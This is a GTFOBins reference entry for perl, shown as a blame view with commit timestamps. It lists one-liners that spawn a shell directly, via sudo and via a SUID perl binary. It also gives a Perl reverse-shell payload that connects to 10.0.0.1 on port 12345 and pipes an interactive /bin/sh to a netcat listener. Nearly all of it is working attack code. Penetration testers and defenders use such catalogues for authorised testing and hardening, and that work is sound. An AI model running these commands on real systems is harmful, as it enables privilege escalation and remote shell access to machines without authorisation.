GTFOBins.github.io/_gtfobins/perl.md

15 lines
594 B
Markdown
Raw Normal View History

2018-05-21 21:14:41 +02:00
---
functions:
exec-interactive:
- code: perl -e 'exec "/bin/sh";'
sudo-enabled:
- code: sudo perl -e 'exec "/bin/sh";'
suid-enabled:
- code: ./perl -e 'exec "/bin/sh";'
reverse-shell:
2018-05-23 09:08:13 +02:00
- description: Run `nc -l -p 12345` to receive the shell on the other end.
2018-05-22 20:21:16 +02:00
code: |
export RHOST=10.0.0.1
2018-05-23 09:08:13 +02:00
export RPORT=12345
2018-05-21 21:14:41 +02:00
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
---